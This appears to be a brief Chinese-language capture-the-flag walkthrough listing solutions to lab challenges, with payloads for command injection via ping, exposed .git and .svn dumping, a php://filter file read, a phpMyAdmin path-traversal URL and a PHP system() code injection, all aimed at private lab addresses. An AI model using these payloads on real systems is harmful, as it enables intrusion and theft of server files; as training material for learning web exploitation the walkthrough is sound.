RCE
打开浏览器,访问靶机
Ping 127.0.0.1
Ping 127.0.0.1|ls 这时会显示出flag.php文件
127.0.0.1|cat flag.php 然后查看页面源代码,就能看到flag
Git
靶机之后加/.git
http://172.16.200.100:27700/.git/
下载git破解工具,下载python
py -3 GitHack.py http://172.16.200.100:27700/.git/
到破解工具文件夹中找下载的index.php
本地文件打开index.php
Svn
靶机之后加/.svn
直接点击wc.db,里面有flag
Easyweb200
打开靶机,点击上传文件
改op=后面的内容php://filter/convert.base64-encode/resource=flag
拿到一串码
然后用转码工具,base64ToText
Database
打开靶机,下载目录扫描工具
管理员执行 py -3 .\dirsearch.py -u http://172.16.200.100:25612/
扫描到:http://172.16.200.100:25612/phpmyadmin/
地址改成:/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../flag
就能看到flag
Pigs
打开图片,下载图片隐写监测工具,java运行,截图
下载二维码扫描工具,加载图片,获得flag
Easyweb
adadmiadminmin
dumpster_diving
下载后用工具查看二进制码,直接搜索flag{
Magic
QNKCDZO
Easytest
查看源代码
Mfw
Git扫描工具扫描,看源码
?page=123') or system("cat templates/flag.php");//
查看源文件